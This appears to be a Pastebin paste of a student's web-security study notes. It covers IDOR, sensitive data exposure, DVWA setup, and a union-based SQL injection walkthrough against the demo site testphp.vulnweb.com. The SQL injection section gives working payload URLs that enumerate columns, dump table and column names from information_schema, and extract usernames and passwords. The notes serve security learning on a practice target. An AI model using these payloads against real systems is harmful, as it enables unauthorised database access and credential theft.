Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Insecure Direct Object Reference
- Sensitive Data Exposure
- DVWA set up and configuration
- Union Based Sql Inection
- _______________________________
- Insecure Direct Object Reference
- It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account for
- example
- http://anywebsite.com/dashboard?user=someuser or id=12342
- http://anywebsite.com/dashboard?user=randomuser or id=12348
- if a hacker is a able to change assigned parameter by a website to some other parameter and gain access to the other users account then it is IDOR vulnerability
- -> hacker can also change passwords
- http://anywebsite.com/changepassword?user=someuser
- why this attack occurs
- ->deveoloper use direct references to restricted resources and application fails to verify wether the use is authorised on not.
- ->improper check access
- --->WAVE
- ____________________________
- Sensitive Data Exposure
- Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
- eg 1
- An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
- eg 2
- A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
- traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
- ________________________________________
- DVWA set up and configuaration
- install XAMPP
- X->cross platform
- A->Apache
- M->Mysql
- P->PHP
- P->Perl
- XAMPP-> It is a lightweight software distribution that makes it extremely easy for developer to create a local webserver for testing and deployment purposes
- DVWA->Damn Vulnerable Web App
- DVWA is a vulnerable app by default, budding security students can learn to attack and patch vulnerabilities from performin attacks on this application
- ->unzip the file
- ->Copy the folder and paste in C:\xampp\htdocs
- ->open Xampp->start apache ->mysql
- ->open the pasted folder "dvwa" in this case
- ->navigate to the folder 'config'
- ->open config.php file and leave password=""(blank)
- ->open the browser and go to 127.0.0.1/dvwa
- ->click on 'click to create a database'
- __________________________________
- Union SQl Injection
- ->testphp.vulnweb.com
- -> find a parameter
- test wether it has an sql database or not
- ->Check errors
- http://testphp.vulnweb.com/listproducts.php?cat=1
- http://testphp.vulnweb.com/listproducts.php?cat=1'
- ->Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- ->http://testphp.vulnweb.com/listproducts.php?cat=1' order by 1--+
- ->remove '
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--+
- -> Error: Unknown column '12' in 'order clause' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- search art
- -->Unknown column<--
- --> know we know that we have
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11--+
- ->we get vulnerable tables
- 2,7,9
- ->version()
- ->database()
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables--+
- ->It will give us list of table name now we know which table to use/select
- ->>"users"
- ->now we need columns
- ->>http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,column_name,8,9,10,11 from information_schema.columns where table_name="users"--+
- ->now we know we have column names like-->>>>>>>>>>uname,pass,address,email,name
- ->juicy info kha se mil sakta hen
- ->uname,pass,address
- ->so
- ->
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,group_concat(uname,':',pass),8,9,10,11 from users--+
- -> and we get username and password
- union-> union is an sql operator ,it's job is to combine the result of two or more select statement into a single result which is then returned as a part of HTTP response.
- ->order by is used for sorting
- ->Select->
- A select query is a database object that shows information in Datasheet view
- what is information schema?
- ->
- Information schema is a structure set which store metadata and other information about tabls,views,columns and procedures in a database
- Database ki mummy
Add Comment
Please, Sign In to add comment